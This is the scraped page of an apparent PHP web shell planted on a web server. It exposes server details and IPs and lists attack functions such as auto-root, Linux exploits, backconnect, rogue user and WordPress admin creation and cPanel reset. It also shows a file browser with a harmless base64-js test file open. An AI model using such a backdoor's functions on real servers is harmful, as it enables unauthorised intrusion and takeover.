Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
base64-js /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
big-data.js
591
B
-rw-r--r--
convert.js
2.15
KB
-rw-r--r--
corrupt.js
304
B
-rw-r--r--
url-safe.js
577
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : url-safe.js
var test = require('tape') var b64 = require('../') test('decode url-safe style base64 strings', function (t) { var expected = [0xff, 0xff, 0xbe, 0xff, 0xef, 0xbf, 0xfb, 0xef, 0xff] var str = '//++/++/++//' var actual = b64.toByteArray(str) for (var i = 0; i < actual.length; i++) { t.equal(actual[i], expected[i]) } t.equal(b64.byteLength(str), actual.length) str = '__--_--_--__' actual = b64.toByteArray(str) for (i = 0; i < actual.length; i++) { t.equal(actual[i], expected[i]) } t.equal(b64.byteLength(str), actual.length) t.end() })
Close